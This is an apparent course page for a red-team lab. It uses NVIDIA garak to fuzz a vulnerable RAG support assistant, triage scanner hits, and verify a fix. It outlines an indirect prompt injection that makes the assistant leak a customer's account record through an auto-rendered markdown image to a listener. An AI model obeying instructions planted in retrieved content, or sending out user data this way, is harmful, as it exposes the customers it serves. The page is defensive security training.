Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives
Run NVIDIA garak as an automated fuzzer against a real vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then do the skill that separates a scanner operator from a red teamer: triage the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.
Hands-on labs require Pro · $29.99/mo · cancel anytime
What you'll learn
- 1Recon: stand up the vulnerable target behind an OpenAI endpointYou are automating red-team testing of DV-RAG-Support, ACME Cloud's
- 2Run the scan: fire a broad garak discovery battery at the endpointgarak runs a battery of probes (attack generators) against a generator and
- 3Read the report: count hits per probe and grade the runA garak run produces several artifacts:
- 4Triage a false positive: dismiss a detector hit with evidenceScanners over-report. The triage skill is asking, for every hit, "did the
- 5Confirm a true positive: run the custom probe, prove the effect on the listenerA true positive is confirmed by reproducing the effect, not by trusting a
- 6Harden the render sink: allow-list the one channel the finding rode out onSwitch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
- 7Distrust the retrieved context: reframe context as data, never instructionsThe render allow-list from step 6 is the load-bearing fix: it closes the exfil
- 8Verify the regression: fixed = 0 findings, reintroduced = re-tripsA fix only counts when you re-run the exact confirmed attack and watch it fail.
Prerequisites
- Comfortable reading Python and JSON
- Completed (or understand) Module 2 indirect prompt injection
- No ML background required
Exam domains covered
Skills & technologies you'll practice
This advanced-level ai/ml lab gives you real-world reps across:
What you'll do in this lab
This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.
You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.